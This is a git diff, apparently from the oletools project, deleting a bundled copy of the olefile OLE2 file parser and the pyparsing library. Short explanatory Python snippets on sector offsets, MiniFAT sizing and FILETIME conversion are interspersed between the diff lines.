- #[PL] Old code replaced by an array:
- #self.minifat = [i32(s, i) for i in range(0, len(s), 4)]
- self.minifat = self.sect2array(s)
- # Then shrink the array to used size, to avoid indexes out of MiniStream:
- log.debug('MiniFAT shrunk from %d to %d sectors' % (len(self.minifat), nb_minisectors))
- self.minifat = self.minifat[:nb_minisectors]
- log.debug('loadminifat(): len=%d' % len(self.minifat))
- # Display the FAT contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- log.debug('\nMiniFAT:')
- self.dumpfat(self.minifat)
-
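The two MiniFAT sizes described in the comments above (allocated vs. actually used) can be illustrated with a small standalone calculation (hypothetical numbers, not taken from a real file):

```python
def minifat_sizes(num_mini_fat_sectors, root_size,
                  sector_size=512, mini_sector_size=64):
    # 1) Allocated size: full sectors declared in the OLE header.
    stream_size = num_mini_fat_sectors * sector_size
    # 2) Used size: one 32-bit index per mini sector of the MiniStream,
    #    whose length is given by the root directory entry (rounded up).
    nb_minisectors = (root_size + mini_sector_size - 1) // mini_sector_size
    used_size = nb_minisectors * 4
    return stream_size, used_size

# A 1000-byte MiniStream needs 16 mini sectors -> 64 bytes of MiniFAT indexes,
# but a full 512-byte sector is allocated for the MiniFAT stream:
print(minifat_sizes(1, 1000))  # (512, 64)
```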
- def getsect(self, sect):
- """
- Read given sector from file on disk.
-
- :param sect: int, sector index
- :returns: a string containing the sector data.
- """
- # From [MS-CFB]: A sector number can be converted into a byte offset
- # into the file by using the following formula:
- # (sector number + 1) x Sector Size.
- # This implies that sector #0 of the file begins at byte offset Sector
- # Size, not at 0.
-
- # [PL] the original code in PIL was wrong when sectors are 4KB instead of
- # 512 bytes:
- #self.fp.seek(512 + self.sectorsize * sect)
- #[PL]: added safety checks:
- #print("getsect(%X)" % sect)
- try:
- self.fp.seek(self.sectorsize * (sect+1))
- except:
- log.debug('getsect(): sect=%X, seek=%d, filesize=%d' %
- (sect, self.sectorsize*(sect+1), self._filesize))
- self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range')
- sector = self.fp.read(self.sectorsize)
- if len(sector) != self.sectorsize:
- log.debug('getsect(): sect=%X, read=%d, sectorsize=%d' %
- (sect, len(sector), self.sectorsize))
- self._raise_defect(DEFECT_FATAL, 'incomplete OLE sector')
- return sector
-
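The [MS-CFB] offset formula used by `getsect` above is simple enough to verify directly (a standalone sketch):

```python
def sector_offset(sect, sector_size=512):
    # [MS-CFB]: byte offset = (sector number + 1) * sector size,
    # because sector #0 begins right after the header, not at offset 0.
    return (sect + 1) * sector_size

print(sector_offset(0))        # 512  (first sector, right after the header)
print(sector_offset(3))        # 2048
print(sector_offset(0, 4096))  # 4096 (with 4KB sectors, sector #0 starts at 4096)
```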
-
- def write_sect(self, sect, data, padding=b'\x00'):
- """
- Write given sector to file on disk.
-
- :param sect: int, sector index
- :param data: bytes, sector data
- :param padding: single byte, padding character if data < sector size
- """
- if not isinstance(data, bytes):
- raise TypeError("write_sect: data must be a bytes string")
- if not isinstance(padding, bytes) or len(padding)!=1:
- raise TypeError("write_sect: padding must be a bytes string of 1 char")
- #TODO: we could allow padding=None for no padding at all
- try:
- self.fp.seek(self.sectorsize * (sect+1))
- except:
- log.debug('write_sect(): sect=%X, seek=%d, filesize=%d' %
- (sect, self.sectorsize*(sect+1), self._filesize))
- self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range')
- if len(data) < self.sectorsize:
- # add padding
- data += padding * (self.sectorsize - len(data))
- elif len(data) > self.sectorsize:
- raise ValueError("Data is larger than sector size")
- self.fp.write(data)
-
-
- def loaddirectory(self, sect):
- """
- Load the directory.
-
- :param sect: sector index of directory stream.
- """
- log.debug('Loading the Directory:')
- # The directory is stored in a standard
- # substream, independent of its size.
-
- # open directory stream as a read-only file:
- # (stream size is not known in advance)
- self.directory_fp = self._open(sect)
-
- #[PL] to detect malformed documents and avoid DoS attacks, the maximum
- # number of directory entries can be calculated:
- max_entries = self.directory_fp.size // 128
- log.debug('loaddirectory: size=%d, max_entries=%d' %
- (self.directory_fp.size, max_entries))
-
- # Create list of directory entries
- #self.direntries = []
- # We start with a list of "None" object
- self.direntries = [None] * max_entries
-## for sid in iterrange(max_entries):
-## entry = fp.read(128)
-## if not entry:
-## break
-## self.direntries.append(OleDirectoryEntry(entry, sid, self))
- # load root entry:
- root_entry = self._load_direntry(0)
- # Root entry is the first entry:
- self.root = self.direntries[0]
- # TODO: read ALL directory entries (ignore bad entries?)
- # TODO: adapt build_storage_tree to avoid duplicate reads
- # for i in range(1, max_entries):
- # self._load_direntry(i)
- # read and build all storage trees, starting from the root:
- self.root.build_storage_tree()
-
-
- def _load_direntry (self, sid):
- """
- Load a directory entry from the directory.
- This method should only be called once for each storage/stream when
- loading the directory.
-
- :param sid: index of storage/stream in the directory.
- :returns: a OleDirectoryEntry object
-
- :exception IOError: if the entry has already been referenced.
- """
- # check if SID is OK:
- if sid<0 or sid>=len(self.direntries):
- self._raise_defect(DEFECT_FATAL, "OLE directory index out of range")
- # check if entry was already referenced:
- if self.direntries[sid] is not None:
- self._raise_defect(DEFECT_INCORRECT,
- "double reference for OLE stream/storage")
- # if exception not raised, return the object
- return self.direntries[sid]
- self.directory_fp.seek(sid * 128)
- entry = self.directory_fp.read(128)
- self.direntries[sid] = OleDirectoryEntry(entry, sid, self)
- return self.direntries[sid]
-
-
- def dumpdirectory(self):
- """
- Dump directory (for debugging only)
- """
- self.root.dump()
-
-
- def _open(self, start, size = UNKNOWN_SIZE, force_FAT=False):
- """
- Open a stream, either in FAT or MiniFAT according to its size.
- (openstream helper)
-
- :param start: index of first sector
- :param size: size of stream (or nothing if size is unknown)
- :param force_FAT: if False (default), stream will be opened in FAT or MiniFAT
- according to size. If True, it will always be opened in FAT.
- """
- log.debug('OleFileIO.open(): sect=%Xh, size=%d, force_FAT=%s' %
- (start, size, str(force_FAT)))
- # stream size is compared to the mini_stream_cutoff_size threshold:
- if size < self.minisectorcutoff and not force_FAT:
- # ministream object
- if not self.ministream:
- # load MiniFAT if it wasn't already done:
- self.loadminifat()
- # The first sector index of the miniFAT stream is stored in the
- # root directory entry:
- size_ministream = self.root.size
- log.debug('Opening MiniStream: sect=%Xh, size=%d' %
- (self.root.isectStart, size_ministream))
- self.ministream = self._open(self.root.isectStart,
- size_ministream, force_FAT=True)
- return OleStream(fp=self.ministream, sect=start, size=size,
- offset=0, sectorsize=self.minisectorsize,
- fat=self.minifat, filesize=self.ministream.size,
- olefileio=self)
- else:
- # standard stream
- return OleStream(fp=self.fp, sect=start, size=size,
- offset=self.sectorsize,
- sectorsize=self.sectorsize, fat=self.fat,
- filesize=self._filesize,
- olefileio=self)
-
-
- def _list(self, files, prefix, node, streams=True, storages=False):
- """
- listdir helper
-
- :param files: list of files to fill in
- :param prefix: current location in storage tree (list of names)
- :param node: current node (OleDirectoryEntry object)
- :param streams: bool, include streams if True (True by default) - new in v0.26
- :param storages: bool, include storages if True (False by default) - new in v0.26
- (note: the root storage is never included)
- """
- prefix = prefix + [node.name]
- for entry in node.kids:
- if entry.entry_type == STGTY_STORAGE:
- # this is a storage
- if storages:
- # add it to the list
- files.append(prefix[1:] + [entry.name])
- # check its kids
- self._list(files, prefix, entry, streams, storages)
- elif entry.entry_type == STGTY_STREAM:
- # this is a stream
- if streams:
- # add it to the list
- files.append(prefix[1:] + [entry.name])
- else:
- self._raise_defect(DEFECT_INCORRECT, 'The directory tree contains an entry which is neither a stream nor a storage.')
-
-
- def listdir(self, streams=True, storages=False):
- """
- Return a list of streams and/or storages stored in this file
-
- :param streams: bool, include streams if True (True by default) - new in v0.26
- :param storages: bool, include storages if True (False by default) - new in v0.26
- (note: the root storage is never included)
- :returns: list of stream and/or storage paths
- """
- files = []
- self._list(files, [], self.root, streams, storages)
- return files
-
-
- def _find(self, filename):
- """
- Returns directory entry of given filename. (openstream helper)
- Note: this method is case-insensitive.
-
- :param filename: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
- :returns: sid of requested filename
- :exception IOError: if file not found
- """
-
- # if filename is a string instead of a list, split it on slashes to
- # convert to a list:
- if isinstance(filename, basestring):
- filename = filename.split('/')
- # walk across storage tree, following given path:
- node = self.root
- for name in filename:
- for kid in node.kids:
- if kid.name.lower() == name.lower():
- break
- else:
- raise IOError("file not found")
- node = kid
- return node.sid
-
-
- def openstream(self, filename):
- """
- Open a stream as a read-only file object (BytesIO).
- Note: filename is case-insensitive.
-
- :param filename: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
- :returns: file object (read-only)
- :exception IOError: if filename not found, or if this is not a stream.
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- if entry.entry_type != STGTY_STREAM:
- raise IOError("this file is not a stream")
- return self._open(entry.isectStart, entry.size)
-
-
- def write_stream(self, stream_name, data):
- """
- Write a stream to disk. For now, it is only possible to replace an
- existing stream by data of the same size.
-
- :param stream_name: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
- :param data: bytes, data to be written, must be the same size as the original
- stream.
- """
- if not isinstance(data, bytes):
- raise TypeError("write_stream: data must be a bytes string")
- sid = self._find(stream_name)
- entry = self.direntries[sid]
- if entry.entry_type != STGTY_STREAM:
- raise IOError("this is not a stream")
- size = entry.size
- if size != len(data):
- raise ValueError("write_stream: data must be the same size as the existing stream")
- if size < self.minisectorcutoff:
- raise NotImplementedError("Writing a stream in MiniFAT is not implemented yet")
- sect = entry.isectStart
- # number of sectors to write
- nb_sectors = (size + (self.sectorsize-1)) // self.sectorsize
- log.debug('nb_sectors = %d' % nb_sectors)
- for i in range(nb_sectors):
-## try:
-## self.fp.seek(offset + self.sectorsize * sect)
-## except:
-## log.debug('sect=%d, seek=%d' %
-## (sect, offset+self.sectorsize*sect))
-## raise IOError('OLE sector index out of range')
- # extract one sector from data, the last one being smaller:
- if i<(nb_sectors-1):
- data_sector = data [i*self.sectorsize : (i+1)*self.sectorsize]
- #TODO: comment this if it works
- assert(len(data_sector)==self.sectorsize)
- else:
- data_sector = data [i*self.sectorsize:]
- #TODO: comment this if it works
- log.debug('write_stream: size=%d sectorsize=%d data_sector=%Xh size%%sectorsize=%d'
- % (size, self.sectorsize, len(data_sector), size % self.sectorsize))
- assert(len(data_sector) % self.sectorsize==size % self.sectorsize)
- self.write_sect(sect, data_sector)
-## self.fp.write(data_sector)
- # jump to next sector in the FAT:
- try:
- sect = self.fat[sect]
- except IndexError:
- # [PL] if pointer is out of the FAT an exception is raised
- raise IOError('incorrect OLE FAT, sector index out of range')
- #[PL] Last sector should be a "end of chain" marker:
- if sect != ENDOFCHAIN:
- raise IOError('incorrect last sector index in OLE stream')
-
-
- def get_type(self, filename):
- """
- Test if given filename exists as a stream or a storage in the OLE
- container, and return its type.
-
- :param filename: path of stream in storage tree. (see openstream for syntax)
- :returns: False if object does not exist, its entry type (>0) otherwise:
-
- - STGTY_STREAM: a stream
- - STGTY_STORAGE: a storage
- - STGTY_ROOT: the root entry
- """
- try:
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.entry_type
- except:
- return False
-
-
- def getclsid(self, filename):
- """
- Return clsid of a stream/storage.
-
- :param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
- :returns: Empty string if clsid is null, a printable representation of the clsid otherwise
-
- new in version 0.44
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.clsid
-
-
- def getmtime(self, filename):
- """
- Return modification time of a stream/storage.
-
- :param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
- :returns: None if modification time is null, a python datetime object
- otherwise (UTC timezone)
-
- new in version 0.26
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.getmtime()
-
-
- def getctime(self, filename):
- """
- Return creation time of a stream/storage.
-
- :param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
- :returns: None if creation time is null, a python datetime object
- otherwise (UTC timezone)
-
- new in version 0.26
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.getctime()
-
-
- def exists(self, filename):
- """
- Test if given filename exists as a stream or a storage in the OLE
- container.
- Note: filename is case-insensitive.
-
- :param filename: path of stream in storage tree. (see openstream for syntax)
- :returns: True if object exists, else False.
- """
- try:
- sid = self._find(filename)
- return True
- except:
- return False
-
-
- def get_size(self, filename):
- """
- Return size of a stream in the OLE container, in bytes.
-
- :param filename: path of stream in storage tree (see openstream for syntax)
- :returns: size in bytes (long integer)
- :exception IOError: if file not found
- :exception TypeError: if this is not a stream.
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- if entry.entry_type != STGTY_STREAM:
- #TODO: Should it return zero instead of raising an exception ?
- raise TypeError('object is not an OLE stream')
- return entry.size
-
-
- def get_rootentry_name(self):
- """
- Return root entry name. Should usually be 'Root Entry' or 'R' in most
- implementations.
- """
- return self.root.name
-
-
- def getproperties(self, filename, convert_time=False, no_conversion=None):
- """
- Return properties described in substream.
-
- :param filename: path of stream in storage tree (see openstream for syntax)
- :param convert_time: bool, if True timestamps will be converted to Python datetime
- :param no_conversion: None or list of int, timestamps not to be converted
- (for example total editing time is not a real timestamp)
-
- :returns: a dictionary of values indexed by id (integer)
- """
- #REFERENCE: [MS-OLEPS] https://msdn.microsoft.com/en-us/library/dd942421.aspx
- # make sure no_conversion is a list, just to simplify code below:
- if no_conversion == None:
- no_conversion = []
- # stream path as a string to report exceptions:
- streampath = filename
- if not isinstance(streampath, str):
- streampath = '/'.join(streampath)
-
- fp = self.openstream(filename)
-
- data = {}
-
- try:
- # header
- s = fp.read(28)
- clsid = _clsid(s[8:24])
-
- # format id
- s = fp.read(20)
- fmtid = _clsid(s[:16])
- fp.seek(i32(s, 16))
-
- # get section
- s = b"****" + fp.read(i32(fp.read(4))-4)
- # number of properties:
- num_props = i32(s, 4)
- except BaseException as exc:
- # catch exception while parsing property header, and only raise
- # a DEFECT_INCORRECT then return an empty dict, because this is not
- # a fatal error when parsing the whole file
- msg = 'Error while parsing properties header in stream %s: %s' % (
- repr(streampath), exc)
- self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
- return data
-
- # clamp num_props based on the data length
- num_props = min(num_props, len(s) // 8)
-
- for i in iterrange(num_props):
- property_id = 0 # just in case of an exception
- try:
- property_id = i32(s, 8+i*8)
- offset = i32(s, 12+i*8)
- property_type = i32(s, offset)
-
- log.debug('property id=%d: type=%d offset=%X' % (property_id, property_type, offset))
-
- # test for common types first (should perhaps use
- # a dictionary instead?)
-
- if property_type == VT_I2: # 16-bit signed integer
- value = i16(s, offset+4)
- if value >= 32768:
- value = value - 65536
- elif property_type == VT_UI2: # 2-byte unsigned integer
- value = i16(s, offset+4)
- elif property_type in (VT_I4, VT_INT, VT_ERROR):
- # VT_I4: 32-bit signed integer
- # VT_ERROR: HRESULT, similar to 32-bit signed integer,
- # see https://msdn.microsoft.com/en-us/library/cc230330.aspx
- value = i32(s, offset+4)
- elif property_type in (VT_UI4, VT_UINT): # 4-byte unsigned integer
- value = i32(s, offset+4) # FIXME
- elif property_type in (VT_BSTR, VT_LPSTR):
- # CodePageString, see https://msdn.microsoft.com/en-us/library/dd942354.aspx
- # size is a 32 bits integer, including the null terminator, and
- # possibly trailing or embedded null chars
- #TODO: if codepage is unicode, the string should be converted as such
- count = i32(s, offset+4)
- value = s[offset+8:offset+8+count-1]
- # remove all null chars:
- value = value.replace(b'\x00', b'')
- elif property_type == VT_BLOB:
- # binary large object (BLOB)
- # see https://msdn.microsoft.com/en-us/library/dd942282.aspx
- count = i32(s, offset+4)
- value = s[offset+8:offset+8+count]
- elif property_type == VT_LPWSTR:
- # UnicodeString
- # see https://msdn.microsoft.com/en-us/library/dd942313.aspx
- # "the string should NOT contain embedded or additional trailing
- # null characters."
- count = i32(s, offset+4)
- value = self._decode_utf16_str(s[offset+8:offset+8+count*2])
- elif property_type == VT_FILETIME:
- value = long(i32(s, offset+4)) + (long(i32(s, offset+8))<<32)
- # FILETIME is a 64-bit int: "number of 100ns periods
- # since Jan 1,1601".
- if convert_time and property_id not in no_conversion:
- log.debug('Converting property #%d to python datetime, value=%d=%fs'
- %(property_id, value, float(value)/10000000))
- # convert FILETIME to Python datetime.datetime
- # inspired from https://code.activestate.com/recipes/511425-filetime-to-datetime/
- _FILETIME_null_date = datetime.datetime(1601, 1, 1, 0, 0, 0)
- log.debug('timedelta days=%d' % (value//(10*1000000*3600*24)))
- value = _FILETIME_null_date + datetime.timedelta(microseconds=value//10)
- else:
- # legacy code kept for backward compatibility: returns a
- # number of seconds since Jan 1,1601
- value = value // 10000000 # seconds
- elif property_type == VT_UI1: # 1-byte unsigned integer
- value = i8(s[offset+4])
- elif property_type == VT_CLSID:
- value = _clsid(s[offset+4:offset+20])
- elif property_type == VT_CF:
- # PropertyIdentifier or ClipboardData??
- # see https://msdn.microsoft.com/en-us/library/dd941945.aspx
- count = i32(s, offset+4)
- value = s[offset+8:offset+8+count]
- elif property_type == VT_BOOL:
- # VARIANT_BOOL, 16 bits bool, 0x0000=False, 0xFFFF=True
- # see https://msdn.microsoft.com/en-us/library/cc237864.aspx
- value = bool(i16(s, offset+4))
- else:
- value = None # everything else yields "None"
- log.debug('property id=%d: type=%d not implemented in parser yet' % (property_id, property_type))
-
- # missing: VT_EMPTY, VT_NULL, VT_R4, VT_R8, VT_CY, VT_DATE,
- # VT_DECIMAL, VT_I1, VT_I8, VT_UI8,
- # see https://msdn.microsoft.com/en-us/library/dd942033.aspx
-
- # FIXME: add support for VT_VECTOR
- # VT_VECTOR is a 32 uint giving the number of items, followed by
- # the items in sequence. The VT_VECTOR value is combined with the
- # type of items, e.g. VT_VECTOR|VT_BSTR
- # see https://msdn.microsoft.com/en-us/library/dd942011.aspx
-
- #print("%08x" % property_id, repr(value), end=" ")
- #print("(%s)" % VT[i32(s, offset) & 0xFFF])
-
- data[property_id] = value
- except BaseException as exc:
- # catch exception while parsing each property, and only raise
- # a DEFECT_INCORRECT, because parsing can go on
- msg = 'Error while parsing property id %d in stream %s: %s' % (
- property_id, repr(streampath), exc)
- self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
-
- return data
-
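The VT_FILETIME handling in `getproperties` above boils down to the following conversion, shown here as a standalone sketch (the reverse conversion is added only to make the round trip testable):

```python
import datetime

FILETIME_EPOCH = datetime.datetime(1601, 1, 1)

def filetime_to_datetime(value):
    # FILETIME is a 64-bit count of 100ns intervals since Jan 1, 1601 (UTC).
    # 100ns = 0.1 microsecond, hence the integer division by 10:
    return FILETIME_EPOCH + datetime.timedelta(microseconds=value // 10)

def datetime_to_filetime(dt):
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10**7 + delta.microseconds * 10

dt = datetime.datetime(2019, 6, 1, 12, 0, 0)
assert filetime_to_datetime(datetime_to_filetime(dt)) == dt
print(filetime_to_datetime(datetime_to_filetime(dt)))  # 2019-06-01 12:00:00
```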
- def get_metadata(self):
- """
- Parse standard properties streams, return an OleMetadata object
- containing all the available metadata.
- (also stored in the metadata attribute of the OleFileIO object)
-
- new in version 0.25
- """
- self.metadata = OleMetadata()
- self.metadata.parse_properties(self)
- return self.metadata
-
-#
-# --------------------------------------------------------------------
-# This script can be used to dump the directory of any OLE2 structured
-# storage file.
-
-if __name__ == "__main__":
-
- import sys, optparse
-
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {
- 'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
-
- usage = 'usage: %prog [options] <filename> [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- parser.add_option("-c", action="store_true", dest="check_streams",
- help='check all streams (for debugging purposes)')
- parser.add_option("-d", action="store_true", dest="debug_mode",
- help='debug mode, shortcut for -l debug (displays a lot of debug information, for developers only)')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
-
- (options, args) = parser.parse_args()
-
- print('olefile version %s %s - https://www.decalage.info/en/olefile\n' % (__version__, __date__))
-
- # Print help if no arguments are passed
- if len(args) == 0:
- print(__doc__)
- parser.print_help()
- sys.exit()
-
- if options.debug_mode:
- options.loglevel = 'debug'
-
- # setup logging to the console
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
-
- # also enable the module's logger:
- enable_logging()
-
- for filename in args:
- try:
- ole = OleFileIO(filename)#, raise_defects=DEFECT_INCORRECT)
- print("-" * 68)
- print(filename)
- print("-" * 68)
- ole.dumpdirectory()
- for streamname in ole.listdir():
- if streamname[-1][0] == "\005":
- print("%r: properties" % streamname)
- try:
- props = ole.getproperties(streamname, convert_time=True)
- props = sorted(props.items())
- for k, v in props:
- #[PL]: avoid displaying values that are too large or binary:
- if isinstance(v, (basestring, bytes)):
- if len(v) > 50:
- v = v[:50]
- if isinstance(v, bytes):
- # quick and dirty binary check:
- for c in (1,2,3,4,5,6,7,11,12,14,15,16,17,18,19,20,
- 21,22,23,24,25,26,27,28,29,30,31):
- if c in bytearray(v):
- v = '(binary data)'
- break
- print(" ", k, v)
- except:
- log.exception('Error while parsing property stream %r' % streamname)
-
- if options.check_streams:
- # Read all streams to check if there are errors:
- print('\nChecking streams...')
- for streamname in ole.listdir():
- # print name using repr() to convert binary chars to \xNN:
- print('-', repr('/'.join(streamname)),'-', end=' ')
- st_type = ole.get_type(streamname)
- if st_type == STGTY_STREAM:
- print('size %d' % ole.get_size(streamname))
- # just try to read stream in memory:
- ole.openstream(streamname)
- else:
- print('NOT a stream : type=%d' % st_type)
- print()
-
-## for streamname in ole.listdir():
-## # print name using repr() to convert binary chars to \xNN:
-## print('-', repr('/'.join(streamname)),'-', end=' ')
-## print(ole.getmtime(streamname))
-## print()
-
- print('Modification/Creation times of all directory entries:')
- for entry in ole.direntries:
- if entry is not None:
- print('- %s: mtime=%s ctime=%s' % (entry.name,
- entry.getmtime(), entry.getctime()))
- print()
-
- # parse and display metadata:
- try:
- meta = ole.get_metadata()
- meta.dump()
- except:
- log.exception('Error while parsing metadata')
- print()
- #[PL] Test a few new methods:
- root = ole.get_rootentry_name()
- print('Root entry name: "%s"' % root)
- if ole.exists('worddocument'):
- print("This is a Word document.")
- print("type of stream 'WordDocument':", ole.get_type('worddocument'))
- print("size :", ole.get_size('worddocument'))
- if ole.exists('macros/vba'):
- print("This document may contain VBA macros.")
-
- # print parsing issues:
- print('\nNon-fatal issues raised during parsing:')
- if ole.parsing_issues:
- for exctype, msg in ole.parsing_issues:
- print('- %s: %s' % (exctype.__name__, msg))
- else:
- print('None')
- except:
- log.exception('Error while parsing file %r' % filename)
-
-# this code was developed while listening to The Wedding Present "Sea Monsters"
diff --git a/oletools/thirdparty/pyparsing/LICENSE b/oletools/thirdparty/pyparsing/LICENSE
deleted file mode 100644
index bbc959e0..00000000
--- a/oletools/thirdparty/pyparsing/LICENSE
+++ /dev/null
@@ -1,18 +0,0 @@
-Permission is hereby granted, free of charge, to any person obtaining
-a copy of this software and associated documentation files (the
-"Software"), to deal in the Software without restriction, including
-without limitation the rights to use, copy, modify, merge, publish,
-distribute, sublicense, and/or sell copies of the Software, and to
-permit persons to whom the Software is furnished to do so, subject to
-the following conditions:
-
-The above copyright notice and this permission notice shall be
-included in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
-IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
-CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
-TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
-SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/oletools/thirdparty/pyparsing/README b/oletools/thirdparty/pyparsing/README
deleted file mode 100644
index 44dd51f2..00000000
--- a/oletools/thirdparty/pyparsing/README
+++ /dev/null
@@ -1,72 +0,0 @@
-====================================
-PyParsing -- A Python Parsing Module
-====================================
-
-Introduction
-============
-
-The pyparsing module is an alternative approach to creating and executing
-simple grammars, vs. the traditional lex/yacc approach, or the use of
-regular expressions. The pyparsing module provides a library of classes
-that client code uses to construct the grammar directly in Python code.
-
-Here is a program to parse "Hello, World!" (or any greeting of the form
-"<salutation>, <addressee>!"):
-
- from pyparsing import Word, alphas
- greet = Word( alphas ) + "," + Word( alphas ) + "!"
- hello = "Hello, World!"
- print hello, "->", greet.parseString( hello )
-
-The program outputs the following:
-
- Hello, World! -> ['Hello', ',', 'World', '!']
-
-The Python representation of the grammar is quite readable, owing to the
-self-explanatory class names, and the use of '+', '|' and '^' operator
-definitions.
-
-The parsed results returned from parseString() can be accessed as a
-nested list, a dictionary, or an object with named attributes.
-
-The pyparsing module handles some of the problems that are typically
-vexing when writing text parsers:
-- extra or missing whitespace (the above program will also handle
- "Hello,World!", "Hello , World !", etc.)
-- quoted strings
-- embedded comments
-
-The .zip file includes examples of a simple SQL parser, simple CORBA IDL
-parser, a config file parser, a chemical formula parser, and a four-
-function algebraic notation parser. It also includes a simple how-to
-document, and a UML class diagram of the library's classes.
-
-
-
-Installation
-============
-
-Do the usual:
-
- python setup.py install
-
-(pyparsing requires Python 2.3.2 or later.)
-
-
-Documentation
-=============
-
-See:
-
- HowToUsePyparsing.html
-
-
-License
-=======
-
- MIT License. See header of pyparsing.py
-
-History
-=======
-
- See CHANGES file.
diff --git a/oletools/thirdparty/pyparsing/pyparsing.py b/oletools/thirdparty/pyparsing/pyparsing.py
deleted file mode 100644
index 7b82f715..00000000
--- a/oletools/thirdparty/pyparsing/pyparsing.py
+++ /dev/null
@@ -1,3764 +0,0 @@
-# module pyparsing.py
-#
-# Copyright (c) 2003-2013 Paul T. McGuire
-#
-# Permission is hereby granted, free of charge, to any person obtaining
-# a copy of this software and associated documentation files (the
-# "Software"), to deal in the Software without restriction, including
-# without limitation the rights to use, copy, modify, merge, publish,
-# distribute, sublicense, and/or sell copies of the Software, and to
-# permit persons to whom the Software is furnished to do so, subject to
-# the following conditions:
-#
-# The above copyright notice and this permission notice shall be
-# included in all copies or substantial portions of the Software.
-#
-# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
-# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
-# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
-# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
-# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-#
-
-__doc__ = \
-"""
-pyparsing module - Classes and methods to define and execute parsing grammars
-
-The pyparsing module is an alternative approach to creating and executing simple grammars,
-vs. the traditional lex/yacc approach, or the use of regular expressions. With pyparsing, you
-don't need to learn a new syntax for defining grammars or matching expressions - the parsing module
-provides a library of classes that you use to construct the grammar directly in Python.
-
-Here is a program to parse "Hello, World!" (or any greeting of the form C{"<salutation>, <addressee>!"})::
-
- from pyparsing import Word, alphas
-
- # define grammar of a greeting
- greet = Word( alphas ) + "," + Word( alphas ) + "!"
-
- hello = "Hello, World!"
- print (hello, "->", greet.parseString( hello ))
-
-The program outputs the following::
-
- Hello, World! -> ['Hello', ',', 'World', '!']
-
-The Python representation of the grammar is quite readable, owing to the self-explanatory
-class names, and the use of '+', '|' and '^' operators.
-
-The parsed results returned from C{parseString()} can be accessed as a nested list, a dictionary, or an
-object with named attributes.
-
-The pyparsing module handles some of the problems that are typically vexing when writing text parsers:
- - extra or missing whitespace (the above program will also handle "Hello,World!", "Hello , World !", etc.)
- - quoted strings
- - embedded comments
-"""
-
-__version__ = "2.0.3"
-__versionTime__ = "16 Aug 2014 00:12"
-__author__ = "Paul McGuire <ptmcg@users.sourceforge.net>"
-
-import string
-from weakref import ref as wkref
-import copy
-import sys
-import warnings
-import re
-import sre_constants
-import collections
-import pprint
-#~ sys.stderr.write( "testing pyparsing module, version %s, %s\n" % (__version__,__versionTime__ ) )
-
-__all__ = [
-'And', 'CaselessKeyword', 'CaselessLiteral', 'CharsNotIn', 'Combine', 'Dict', 'Each', 'Empty',
-'FollowedBy', 'Forward', 'GoToColumn', 'Group', 'Keyword', 'LineEnd', 'LineStart', 'Literal',
-'MatchFirst', 'NoMatch', 'NotAny', 'OneOrMore', 'OnlyOnce', 'Optional', 'Or',
-'ParseBaseException', 'ParseElementEnhance', 'ParseException', 'ParseExpression', 'ParseFatalException',
-'ParseResults', 'ParseSyntaxException', 'ParserElement', 'QuotedString', 'RecursiveGrammarException',
-'Regex', 'SkipTo', 'StringEnd', 'StringStart', 'Suppress', 'Token', 'TokenConverter', 'Upcase',
-'White', 'Word', 'WordEnd', 'WordStart', 'ZeroOrMore',
-'alphanums', 'alphas', 'alphas8bit', 'anyCloseTag', 'anyOpenTag', 'cStyleComment', 'col',
